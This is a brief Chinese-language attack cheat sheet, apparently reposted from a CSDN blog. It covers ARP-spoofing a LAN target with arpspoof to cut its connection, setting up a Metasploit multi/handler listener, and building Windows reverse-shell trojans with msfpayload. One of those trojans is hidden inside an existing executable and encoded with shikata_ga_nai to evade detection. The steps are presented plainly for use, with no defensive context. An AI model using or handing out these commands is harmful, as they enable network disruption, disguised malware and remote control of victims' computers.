断网攻击
扫描:
比如kali本身ip为192.168.1.32
使用arpspoof进行arp攻击
本身网卡:eth0,攻击对象:192.168.1.201 网关:192.168.1.1
木马制作
方法一:
使用模块:use exploit/multi/handler
载荷:set payload windows/metepreter/reverse_tcp
填入:show options 端口和ip和制作时的相同
运行:exploit
方法二:
Metasploit
创建:
msfpayload windows/shell/reverse_tcp LHOST=本地IP LPORT=443 X > /tmp/目标文件.exe
原有exe中插入并加密:
msfpayload windows/shell/reverse_tcp LHOST=本地IP LPORT=443 R | msfencode -t exe -x /tmp/模板文件.exe -o /tmp/目标文件.exe -e x86/shikata_ga_nai -c 5
来源:CSDN
作者:c_404
链接:https://blog.csdn.net/weixin_42539095/article/details/103919595